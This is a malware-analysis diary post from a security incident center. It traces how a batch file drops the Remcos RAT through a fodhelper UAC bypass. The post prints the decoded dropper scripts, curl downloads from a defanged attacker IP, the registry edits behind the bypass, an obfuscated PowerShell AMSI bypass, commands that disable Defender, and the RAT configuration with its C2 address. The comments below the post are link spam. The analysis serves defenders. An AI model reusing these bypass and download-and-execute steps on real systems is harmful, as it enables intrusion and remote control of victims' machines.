RAT Delivered Through FODHelper
I found a simple batch file that drops a Remcos[1] RAT through an old UAC Bypass technique. This technique is based on the "fodhelper" utility ("Features On Demand Helper"). Once launched, this tool will search for specific registry keys and, if present, will execute their content with high privileges.
The script, called "2.bat", is very simple. Note that opened into a text editor, it will display Chinese characters due to the BOM (Byte Order Mark):
remnux@remnux:/MalwareZoo/20220919$ xxd 2.bat
00000000: fffe 2663 6c73 0d0a 4065 6368 6f20 6f66 ..&cls..@echo of
00000010: 6620 0d0a 5469 746c 6520 257e 6e30 0d0a f ..Title %~n0..
00000020: 4d6f 6465 2036 302c 3320 0d0a 636f 6c6f Mode 60,3 ..colo
00000030: 7220 3042 0d0a 6563 686f 280d 0a65 6368 r 0B..echo(..ech
00000040: 6f20 2020 2020 2020 2020 506c 6561 7365 o Please
00000050: 2077 6169 742e 2e2e 2061 2077 6869 6c65 wait... a while
00000060: 204c 6f61 6469 6e67 2064 6174 6120 2e2e Loading data ..
00000070: 2e2e 0d0a 4345 5254 5554 494c 202d 6620 ....CERTUTIL -f
Here is the decoded script:
cls @echo off Title %~n0 Mode 60,3 color 0B echo( echo Please wait... a while Loading data .... CERTUTIL -f -decode "%~f0" "%Temp%\2.bat" >nul 2>&1 cls "%Temp%\2.bat" Exit -----BEGIN CERTIFICATE----- QGVjaG8gb2ZmDQplY2hvIFBsZWFzZSB3YWl0IDMwIHNlY29uZHM6IHdlJ3JlIGJ5 cGFzc2luZyB0aGUgQXV0aElEKEhXSUQpLiBUaGlzIHRyYXkgd2lsbCBhdXRvY2xv c2Ugb25jZSBmaW5pc2hlZC4NCmN1cmwuZXhlIC1zIC0tb3V0cHV0ICVVU0VSUFJP RklMRSVcTGlua3NccHVlZG8ucHMxIC0tdXJsIGh0dHA6Ly8xNzEuMjIuMzAuMTIw L3B1ZWRvLnBzMQ0KdGltZW91dCA1ID4gbnVsDQpjdXJsLmV4ZSAtcyAtLW91dHB1 dCAlVVNFUlBST0ZJTEUlXExpbmtzXGFkaGQuYmF0IC0tdXJsIGh0dHA6Ly8xNzEu MjIuMzAuMTIwL2FkaGQuYmF0DQp0aW1lb3V0IDUgPiBudWwNCmN1cmwuZXhlIC1z IC0tb3V0cHV0ICVVU0VSUFJPRklMRSVcTGlua3NcbmV0LnZicyAtLXVybCBodHRw Oi8vMTcxLjIyLjMwLjEyMC9uZXQudmJzDQp0aW1lb3V0IDUgPiBudWwNCnBvd2Vy c2hlbGwgTmV3LUl0ZW0gLVBhdGggSEtDVTpcU29mdHdhcmVcQ2xhc3Nlc1xtcy1z ZXR0aW5nc1xzaGVsbFxvcGVuXGNvbW1hbmQgLVZhbHVlICVVU0VSUFJPRklMRSVc TGlua3NcYWRoZC5iYXQgLUZvcmNlDQpwb3dlcnNoZWxsIE5ldy1JdGVtUHJvcGVy dHkgLVBhdGggSEtDVTpcU29mdHdhcmVcQ2xhc3Nlc1xtcy1zZXR0aW5nc1xzaGVs bFxvcGVuXGNvbW1hbmQgLU5hbWUgRGVsZWdhdGVFeGVjdXRlIC1Qcm9wZXJ0eVR5 cGUgU3RyaW5nIC1Gb3JjZQ0KZm9kaGVscGVyDQpleGl0DQpEZWwgJX4wIA0KDQpE ZWwgJX4wIA0K -----END CERTIFICATE-----
certutil.exe (a common LOLbin) is used to decode the Base64 data present in the file, dump a new bat file and launch it. This is performed thanks to the "%~f0" which returns the full path of the batch file itself. Here is the bat file:
@echo off
echo Please wait 30 seconds: we're bypassing the AuthID(HWID). This tray will autoclose once finished.
curl.exe -s --output %USERPROFILE%\Links\puedo.ps1 --url hxxp://171[.]22[.]30[.]120/puedo.ps1
timeout 5 > nul
curl.exe -s --output %USERPROFILE%\Links\adhd.bat --url hxxp://171[.]22[.]30[.]120/adhd.bat
timeout 5 > nul
curl.exe -s --output %USERPROFILE%\Links\net.vbs --url hxxp://171[.]22[.]30[.]120/net.vbs
timeout 5 > nul
powershell New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value %USERPROFILE%\Links\adhd.bat -Force
powershell New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
fodhelper
exit
Del %~0
Once fodhelper is launched, it will execute adhd.bat, which uses the same technique:
cls @echo off Title %~n0 Mode 60,3 color 0B echo( echo Please wait... a while Loading data .... CERTUTIL -f -decode "%~f0" "%Temp%\adhd - Copia.bat" >nul 2>&1 cls "%Temp%\adhd - Copia.bat" Exit -----BEGIN CERTIFICATE----- QGVjaG8gb2ZmDQplY2hvIEFsbW9zdCBmaW5pc2hlZDogaXQgd2lsbCBhdXRvcnVu cyBpbiBsZXNzIHRoYW4gMTUgc2Vjb25kcyENCmNkICVVU0VSUFJPRklMRSVcTGlu a3NcDQpQb3dlclNoZWxsIC1FeGVjdXRpb25Qb2xpY3kgQnlwYXNzIC1GaWxlICJw dWVkby5wczEiDQplY2hvIEFsbW9zdCBmaW5pc2hlZDogaXQgd2lsbCBhdXRvcnVu cyBpbiBsZXNzIHRoYW4gMTUgc2Vjb25kcyENCnRpbWVvdXQgMTAgPiBudWwNCnN0 YXJ0IG5ldC52YnMNCmV4aXQNCg0KDQpEZWwgJX4wIA0KDQpEZWwgJX4wIA0K -----END CERTIFICATE-----
The decoded Base64 contains:
@echo off echo Almost finished: it will autoruns in less than 15 seconds! cd %USERPROFILE%\Links\ PowerShell -ExecutionPolicy Bypass -File "puedo.ps1" echo Almost finished: it will autoruns in less than 15 seconds! timeout 10 > nul start net.vbs exit Del %~0
The Powershell script "puedo.ps1" is responsible for downloading and executing the malware:
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Set-MpPreference -DisableRealtimeMonitoring $trUE
Set-MpPreference -DisableIOAVProtection $trUE
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:"
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\"
curl.exe -s --output ("photoscreen\$env:USERNAME\Links\Zu@E.jpeg".Replace('photo','C:\').Replace('screen','Users\').Replace('Zu@E','\zoey').Replace('jpeg','exe')) --url ("colibri://google/Papero.exe".Replace('colibri','http').Replace('google','171[.]22[.]30[.]120'))
cd C:\Users\$env:USERNAME\Links
.\zoey.exe
exit
Note that the script tries to disable AMSI and Microsoft Defender. The malware is a Remcos RAT (SHA256:6e83574ed73d798183a1555a910dcc118ac05cf1eac77306ab6edfdcab9207c3) with the following config:
{
"c2": [
"171[.]22[.]30[.]7:5578"
],
"attr": {
"mutex": "asf4fas8sf48asf84as4f89huhhu99h9h-V446WS",
"copy_file": "Isass.exe",
"hide_file": false,
"copy_folder": "Microsoft Updater",
"delete_file": false,
"keylog_file": "logs.dat",
"keylog_flag": false,
"audio_folder": "MicRecords",
"install_flag": true,
"install_path": "%ProgramFiles%",
"keylog_crypt": false,
"mouse_option": false,
"connect_delay": "0",
"keylog_folder": "remcos",
"startup_value": "Windows Host Controller",
"screenshot_flag": false,
"screenshot_path": "%AppData%",
"screenshot_time": "10",
"connect_interval": "1",
"hide_keylog_file": false,
"screenshot_crypt": false,
"audio_record_time": "5",
"screenshot_folder": "Screenshots",
"take_screenshot_time": "5",
"take_screenshot_option": false
},
"rule": "Remcos",
"botnet": "Papero",
"family": "remcos"
}
[1] https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
ISC Stormcast For Thursday, September 22nd, 2022 https://isc.sans.edu/podcastdetail.html?id=8184
×
![modal content]()
Diary Archives
Comments
Anonymous
Dec 3rd 2022
9 months ago
Anonymous
Dec 3rd 2022
9 months ago
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.
<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
Anonymous
Dec 26th 2022
9 months ago
Anonymous
Dec 26th 2022
9 months ago
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
Anonymous
Dec 26th 2022
9 months ago
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
Anonymous
Dec 26th 2022
9 months ago
Anonymous
Dec 26th 2022
9 months ago
https://defineprogramming.com/
Dec 26th 2022
9 months ago
distribute malware. Even if the URL listed on the ad shows a legitimate website, subsequent ad traffic can easily lead to a fake page. Different types of malware are distributed in this manner. I've seen IcedID (Bokbot), Gozi/ISFB, and various information stealers distributed through fake software websites that were provided through Google ad traffic. I submitted malicious files from this example to VirusTotal and found a low rate of detection, with some files not showing as malware at all. Additionally, domains associated with this infection frequently change. That might make it hard to detect.
https://clickercounter.org/
https://defineprogramming.com/
Dec 26th 2022
9 months ago
rthrth
Jan 2nd 2023
8 months ago